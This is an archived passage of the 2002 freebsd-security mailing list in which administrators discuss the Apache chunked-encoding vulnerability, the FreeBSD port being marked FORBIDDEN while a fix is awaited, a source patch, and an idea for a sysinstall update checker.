id g5IDP3124567; Tue, 18 Jun 2002 08:25:03 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5IDP3H00807; Tue, 18 Jun 2002 08:25:03 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5IDOx600800; Tue, 18 Jun 2002 08:25:00 -0500 (CDT) Message-ID: <3D0F34AB.D4DA21B5@centtech.com> Date: Tue, 18 Jun 2002 08:24:59 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Sheldon Hearn Cc: Brett Glass , kgasso@blort.org, security@freebsd.org Subject: Re: CDs with patched Apache? References: <8819.1024405993@axl.seasidesoftware.co.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Heh, yes, it is, but the people who read errata, are the people who subscribe to the security list, are the people who update, are the people we don't need to think about. :) They also are probably the same people that post messages in -chat like "when is 4.6 coming out?? I need it!!" - which means when they see 4.6.1, they'll snatch it up like it's free.. :) Eric Sheldon Hearn wrote: > > On Tue, 18 Jun 2002 08:05:20 EST, Eric Anderson wrote: > > > Why not fix the bugs, and anything else that comes along in the next > > week or so (or however long it takes to fix the bugs and rebuild > > iso's), and release a 4.6.1? > > That's a lot more work than an errata note. :-) > > Ciao, > Sheldon. -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology Torque, it makes the world go 'round. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:13:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from goanga.com (goanga.com [193.231.240.30]) by hub.freebsd.org (Postfix) with ESMTP id 26FFE37B40D for ; Tue, 18 Jun 2002 08:13:10 -0700 (PDT) Received: from abc.ro (goanga.com [193.231.240.30]) by goanga.com (8.11.3/8.11.3) with ESMTP id g5IFD4B24825 for ; Tue, 18 Jun 2002 18:13:07 +0300 (EEST) (envelope-from andrei@abc.ro) Message-ID: <3D0F4DFF.4ABEE1FB@abc.ro> Date: Tue, 18 Jun 2002 18:13:03 +0300 From: ANdrei Organization: Cronon AG - tech department X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: de, ro, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Apache issues Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org have a few questions: 1) anyone heard anything about a worm/exploit for FreeBSD primarly, and other systems, taking advantage of the new Apache bug? 2) is FreeBSD considered to be a possible target? as far as i understood, it shouldn't be vulnerable... and if, does the bug exist in Apache2 too? 3) anyone knows if the ports have the new fixed version? as far as i understood, apache didn't release a fix till now... maybe we should have at least the port "closed" till the fix is out... keep in mind that lots of people do NOT read security lists (i know plenty of them), but they upgrade packages on a regular basis... they could install the "new" apache today, and then not worry like 2 months, though they did the update just one day before the patch was released... Of course, if the port was already frozen, i apologise for this last comment... haven't checked it :) tks, ANdrei -- ----------------------------------[ http://www.goanga.com ]-- Never take life seriously. _ _ Nobody gets out alive anyway. o' \.=./ `o (o o) -----------------------------------------ooO--(_)--Ooo------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:35:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4132437B423 for ; Tue, 18 Jun 2002 08:34:57 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id B93314C; Tue, 18 Jun 2002 10:34:56 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5IFYuJI009406; Tue, 18 Jun 2002 10:34:56 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5IFYpHZ009405; Tue, 18 Jun 2002 10:34:51 -0500 (CDT) Date: Tue, 18 Jun 2002 10:34:51 -0500 From: "Jacques A. Vidrine" To: ANdrei Cc: security@FreeBSD.ORG Subject: Re: Apache issues Message-ID: <20020618153451.GE8793@madman.nectar.cc> References: <3D0F4DFF.4ABEE1FB@abc.ro> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D0F4DFF.4ABEE1FB@abc.ro> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 18, 2002 at 06:13:03PM +0300, ANdrei wrote: > have a few questions: > > 1) anyone heard anything about a worm/exploit for FreeBSD primarly, and > other systems, taking advantage of the new Apache bug? No. Most are of the opinion that the bug is not exploitable (i.e. cannot be used to execute code on the target) on platforms other than Windows --- but of course it is hard to be certain of these things. > 2) is FreeBSD considered to be a possible target? as far as i > understood, it shouldn't be vulnerable... and if, does the bug exist in > Apache2 too? FreeBSD is a possible target to denial-of-service attacks. It does exist in apache 2 also (it was discovered there first). > 3) anyone knows if the ports have the new fixed version? as far as i > understood, apache didn't release a fix till now... maybe we should have > at least the port "closed" till the fix is out... keep in mind that lots > of people do NOT read security lists (i know plenty of them), but they > upgrade packages on a regular basis... they could install the "new" > apache today, and then not worry like 2 months, though they did the > update just one day before the patch was released... > Of course, if the port was already frozen, i apologise for this last > comment... haven't checked it :) The new apache is not available yet. The port is already marked FORBIDDEN. The port maintainers have been notified to look out for the new release. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:36:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 3FDD337B407 for ; Tue, 18 Jun 2002 08:36:34 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 27F83243C0; Tue, 18 Jun 2002 10:36:33 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id AC236243BE; Tue, 18 Jun 2002 10:36:30 -0500 (CDT) Message-Id: <5.1.1.6.2.20020618103108.03b55ca8@pop3s.schulte.org> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 18 Jun 2002 10:34:02 -0500 To: ANdrei , security@FreeBSD.ORG From: Christopher Schulte Subject: Re: Apache issues In-Reply-To: <3D0F4DFF.4ABEE1FB@abc.ro> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 06:13 PM 6/18/2002 +0300, ANdrei wrote: >as far as i understood, apache didn't release a fix till now... I see no fix, yet. From http://httpd.apache.org/ @ Tue Jun 18 10:34:13 CDT 'The Apache Software Foundation are currently working on new releases that fix this issue; please stay tuned here at http://httpd.apache.org/ for updated versions as they become available.' http://www.apache.org/dist/httpd/ shows nothing added or modified in the month of June. Are you seeing something else? >tks, >ANdrei -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:41:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id 41B9A37B407 for ; Tue, 18 Jun 2002 08:41:49 -0700 (PDT) Received: from borja.sarenet.es (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with ESMTP id g5IFflFZ085338 for ; Tue, 18 Jun 2002 17:41:47 +0200 (CEST) (envelope-from borjam@sarenet.es) Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos Organization: Sarenet S.A. To: security@freebsd.org Subject: Re: Apache issues Date: Tue, 18 Jun 2002 17:41:46 +0200 X-Mailer: KMail [version 1.4] References: <3D0F4DFF.4ABEE1FB@abc.ro> In-Reply-To: <3D0F4DFF.4ABEE1FB@abc.ro> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206181741.46606.borjam@sarenet.es> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 18 June 2002 17:13, ANdrei wrote: > have a few questions: > > 1) anyone heard anything about a worm/exploit for FreeBSD primarly, and > other systems, taking advantage of the new Apache bug? =09It can be used for a denial of service. Doing some tests, I have seen = httpd=20 processes receiving a SIGBUS and a SIGSEGV. After that, they enter an end= less=20 loop getting 100% CPU. Under other systems, such as Solaris or Linux, the= =20 httpd processes crash. =09Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:43:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id 25DF337B406 for ; Tue, 18 Jun 2002 08:43:44 -0700 (PDT) Received: from borja.sarenet.es (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with ESMTP id g5IFhgFZ085352 for ; Tue, 18 Jun 2002 17:43:42 +0200 (CEST) (envelope-from borjamar@sarenet.es) Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos To: security@freebsd.org Subject: Re: Apache issues Date: Tue, 18 Jun 2002 17:43:42 +0200 X-Mailer: KMail [version 1.4] References: <5.1.1.6.2.20020618103108.03b55ca8@pop3s.schulte.org> In-Reply-To: <5.1.1.6.2.20020618103108.03b55ca8@pop3s.schulte.org> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206181743.42211.borjamar@sarenet.es> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 18 June 2002 17:34, Christopher Schulte wrote: > Are you seeing something else? =09Updating http_protocol.c to the 1.318 version seems to correct the pro= blem.=20 Anyway, there is nothing more solid; they are finishing a new release=20 (1.3.25). =09Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:45:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id A52E637B405 for ; Tue, 18 Jun 2002 08:44:03 -0700 (PDT) Received: from borja.sarenet.es (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with ESMTP id g5IFi2FZ085364 for ; Tue, 18 Jun 2002 17:44:02 +0200 (CEST) (envelope-from borjamar@sarenet.es) Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos To: security@freebsd.org Subject: Re: Apache issues Date: Tue, 18 Jun 2002 17:44:02 +0200 X-Mailer: KMail [version 1.4] References: <3D0F4DFF.4ABEE1FB@abc.ro> In-Reply-To: <3D0F4DFF.4ABEE1FB@abc.ro> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206181741.46606.borjam@sarenet.es> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 18 June 2002 17:13, ANdrei wrote: > have a few questions: > > 1) anyone heard anything about a worm/exploit for FreeBSD primarly, and > other systems, taking advantage of the new Apache bug? =09It can be used for a denial of service. Doing some tests, I have seen = httpd=20 processes receiving a SIGBUS and a SIGSEGV. After that, they enter an end= less=20 loop getting 100% CPU. Under other systems, such as Solaris or Linux, the= =20 httpd processes crash. =09Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:46:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id EC27537B42F for ; Tue, 18 Jun 2002 08:46:24 -0700 (PDT) Received: from borja.sarenet.es (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with ESMTP id g5IFkNFZ085389 for ; Tue, 18 Jun 2002 17:46:24 +0200 (CEST) (envelope-from borjamar@sarenet.es) Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos To: security@freebsd.org Subject: Re: Apache issues Date: Tue, 18 Jun 2002 17:46:23 +0200 X-Mailer: KMail [version 1.4] References: <5.1.1.6.2.20020618103108.03b55ca8@pop3s.schulte.org> <200206181743.42211.borjamar@sarenet.es> In-Reply-To: <200206181743.42211.borjamar@sarenet.es> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206181746.23549.borjamar@sarenet.es> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 18 June 2002 17:43, Borja Marcos wrote: > On Tuesday 18 June 2002 17:34, Christopher Schulte wrote: > > Are you seeing something else? > > =09Updating http_protocol.c to the 1.318 version seems to correct the > problem. Anyway, there is nothing more solid; they are finishing a new > release (1.3.25). =09Sorry, 1.318. =09http://cvs.apache.org/viewcvs.cgi/apache-1.3/src/main/http_protocol.c =09Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:46:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 4C81237B40F for ; Tue, 18 Jun 2002 08:46:33 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id JAA00962; Tue, 18 Jun 2002 09:45:57 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020618094300.03202e50@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 18 Jun 2002 09:45:52 -0600 To: Eric Anderson , Sheldon Hearn From: Brett Glass Subject: Re: CDs with patched Apache? Cc: kgasso@blort.org, security@freebsd.org In-Reply-To: <3D0F3010.A9F0995A@centtech.com> References: <7957.1024403108@axl.seasidesoftware.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:05 AM 6/18/2002, Eric Anderson wrote: >Maybe FreeBSD needs an "security update check" tool built into sysinstall, that >will do something like: > >If system is being installed from the net, or installing packages from the net, >automatically grab the update list, and show user possible security risks - >possibly asking the user if they would like to upgrade their package/system >right then. Excellent idea! >I think most commercial admins subscribe to the security lists, and will "do the >right thing", but it's the other half of the FreeBSD users that I would worry >about. And even a professional admin can sometimes miss a notice. They're not superhuman, y'know. >There is a reason that almost all OS's are using this tactic to get updates and >patches installed. If this was a seperate tool, it could be used to easily show >the admin what packages are at risk on the box, without the need to manually >match up pkg's installed versus packages at risk. Not only OSes, but other products such as virus checkers, spyware checkers.... Even tax preparation programs. Nowadays, when one sells ANY product on CD, it's a good bet that it will be stale upon arrival. This includes FreeBSD. The installer should anticipate this, as the installers for commercial products do. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 8:49: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id EC7C037B480; Tue, 18 Jun 2002 08:48:43 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id JAA01004; Tue, 18 Jun 2002 09:48:38 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020618094648.0321cf00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 18 Jun 2002 09:48:33 -0600 To: "Jacques A. Vidrine" , ANdrei From: Brett Glass Subject: Re: Apache issues Cc: security@FreeBSD.ORG In-Reply-To: <20020618153451.GE8793@madman.nectar.cc> References: <3D0F4DFF.4ABEE1FB@abc.ro> <3D0F4DFF.4ABEE1FB@abc.ro> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:34 AM 6/18/2002, Jacques A. Vidrine wrote: >FreeBSD is a possible target to denial-of-service attacks. It does >exist in apache 2 also (it was discovered there first). I'm already seeing http processes exiting with signal 8 in my logs. This may mean that people are testing exploits or DoS tools. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 9: 4:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mr01.conversent.com (mr01.conversent.net [216.41.101.18]) by hub.freebsd.org (Postfix) with ESMTP id C6C1F37B409; Tue, 18 Jun 2002 09:04:48 -0700 (PDT) Received: from M5 (warwick.conversent.com [155.212.1.79]) by mr01.conversent.com (8.12.1/8.12.1) with SMTP id g5IG36mI028930; Tue, 18 Jun 2002 12:03:06 -0400 (EDT) From: "Christopher Meiklejohn" To: "Brett Glass" , "Jacques A. Vidrine" , "ANdrei" Cc: Subject: RE: Apache issues Date: Tue, 18 Jun 2002 12:03:07 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <4.3.2.7.2.20020618094648.0321cf00@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I noticed that also. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Brett Glass Sent: Tuesday, June 18, 2002 11:49 AM To: Jacques A. Vidrine; ANdrei Cc: security@FreeBSD.ORG Subject: Re: Apache issues At 09:34 AM 6/18/2002, Jacques A. Vidrine wrote: >FreeBSD is a possible target to denial-of-service attacks. It does >exist in apache 2 also (it was discovered there first). I'm already seeing http processes exiting with signal 8 in my logs. This may mean that people are testing exploits or DoS tools. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 9: 9:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 7458B37B407 for ; Tue, 18 Jun 2002 09:09:53 -0700 (PDT) Received: (qmail 52043 invoked by uid 1001); 18 Jun 2002 16:09:52 -0000 Date: Tue, 18 Jun 2002 12:09:52 -0400 From: "Peter C. Lai" To: Christopher Meiklejohn Cc: Brett Glass , "Jacques A. Vidrine" , ANdrei , security@FreeBSD.ORG Subject: Re: Apache issues Message-ID: <20020618120952.B51798@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <4.3.2.7.2.20020618094648.0321cf00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from cmeiklejohn@conversent.com on Tue, Jun 18, 2002 at 12:03:07PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I trust there will be a security notice/advisory on the apache bug? I've been quite busy lately and seeing the email about the initial report on CERT sent a chill up my spine because I hadn't seen anything about it at all until you guys posted it. -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant Yale Medical School Center for Medical Informatics | Summer Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 9:16: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id D7F1A37B406 for ; Tue, 18 Jun 2002 09:15:55 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 45F8A45; Tue, 18 Jun 2002 11:15:55 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5IGFtJI009606; Tue, 18 Jun 2002 11:15:55 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5IGFr2c009605; Tue, 18 Jun 2002 11:15:53 -0500 (CDT) Date: Tue, 18 Jun 2002 11:15:53 -0500 From: "Jacques A. Vidrine" To: peter.lai@uconn.edu Cc: Christopher Meiklejohn , Brett Glass , ANdrei , security@FreeBSD.ORG Subject: Re: Apache issues Message-ID: <20020618161553.GA9593@madman.nectar.cc> References: <4.3.2.7.2.20020618094648.0321cf00@localhost> <20020618120952.B51798@cowbert.2y.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020618120952.B51798@cowbert.2y.net> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 18, 2002 at 12:09:52PM -0400, Peter C. Lai wrote: > I trust there will be a security notice/advisory on the apache > bug? There is one already at . -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 9:22:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 0885037B404 for ; Tue, 18 Jun 2002 09:22:20 -0700 (PDT) Received: (qmail 52112 invoked by uid 1001); 18 Jun 2002 16:22:19 -0000 Date: Tue, 18 Jun 2002 12:22:19 -0400 From: "Peter C. Lai" To: "Jacques A. Vidrine" Cc: peter.lai@uconn.edu, Christopher Meiklejohn , Brett Glass , ANdrei , security@FreeBSD.ORG Subject: Re: Apache issues Message-ID: <20020618122219.A52107@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <4.3.2.7.2.20020618094648.0321cf00@localhost> <20020618120952.B51798@cowbert.2y.net> <20020618161553.GA9593@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020618161553.GA9593@madman.nectar.cc>; from nectar@FreeBSD.ORG on Tue, Jun 18, 2002 at 11:15:53AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 18, 2002 at 11:15:53AM -0500, Jacques A. Vidrine wrote: > On Tue, Jun 18, 2002 at 12:09:52PM -0400, Peter C. Lai wrote: > > I trust there will be a security notice/advisory on the apache > > bug? > > There is one already at > . I meant for here... > > -- > Jacques A. Vidrine http://www.nectar.cc/ > NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos > jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 9:32:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11]) by hub.freebsd.org (Postfix) with SMTP id 9A2B137B406 for ; Tue, 18 Jun 2002 09:32:44 -0700 (PDT) Received: from walton.maths.tcd.ie by salmon.maths.tcd.ie with SMTP id ; 18 Jun 2002 17:32:43 +0100 (BST) To: freebsd-security@freebsd.org Subject: Re: CDs with patched Apache? Reply-To: freebsd-chat@freebsd.org X-It's: all good X-Wigglefluff: fuddtastic X-Zippy: Don't SANFORIZE me!! In-reply-to: Your message of "Tue, 18 Jun 2002 09:45:52 MDT." <4.3.2.7.2.20020618094300.03202e50@localhost> Date: Tue, 18 Jun 2002 17:32:43 +0100 From: Niall Brady Message-ID: <200206181732.aa33043@salmon.maths.tcd.ie> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 18 Jun 2002 09:45:52 MDT, Brett Glass said: > >And even a professional admin can sometimes miss a notice. They're Brett, this thread is completely inappropriate to -security in its current track; please move it to -chat if you must insist on continuing it. [same to others; no offence meant ;-)] -- Niall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 9:57:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from blort.org (blort.org [208.8.184.14]) by hub.freebsd.org (Postfix) with ESMTP id 294D437B406 for ; Tue, 18 Jun 2002 09:57:47 -0700 (PDT) Received: by blort.org (Postfix, from userid 1001) id 2B56D21051; Tue, 18 Jun 2002 09:57:37 -0700 (PDT) Date: Tue, 18 Jun 2002 09:57:36 -0700 From: Kameron Gasso To: Brett Glass Cc: Eric Anderson , Sheldon Hearn , security@freebsd.org Subject: Re: CDs with patched Apache? Message-ID: <20020618095736.A89330@blort.org> Reply-To: kgasso@blort.org References: <7957.1024403108@axl.seasidesoftware.co.za> <3D0F3010.A9F0995A@centtech.com> <4.3.2.7.2.20020618094300.03202e50@localhost> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="ibTvN161/egqYuK8" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20020618094300.03202e50@localhost>; from brett@lariat.org on Tue, Jun 18, 2002 at 09:45:52AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --ibTvN161/egqYuK8 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable * At 08:47PDT on 06/18/2002, Brett Glass wrote: > At 07:05 AM 6/18/2002, Eric Anderson wrote: >=20 > >Maybe FreeBSD needs an "security update check" tool built into sysinstal= l, that > >will do something like: > > > >If system is being installed from the net, or installing packages from t= he net, > >automatically grab the update list, and show user possible security risk= s - > >possibly asking the user if they would like to upgrade their package/sys= tem > >right then. >=20 > Excellent idea! I agree that this would be useful, especially to users new to FreeBSD - it = not only gives them a chance to update any packages prior to installing, bu= t might also give them warm fuzzies knowing that their newfound OS was "nea= t" enough to check for updates. Either that, or it'll spark their hidden p= aranoia... ;) Seriously though, a project like this would require someone with both enoug= h knowledge and enough free time to head it up. I know that with a full-ti= me job and attempting to spend time with friends and family, I'm not left w= ith much time available for things of this sort - and I'm sure other people= who would love to pursue a 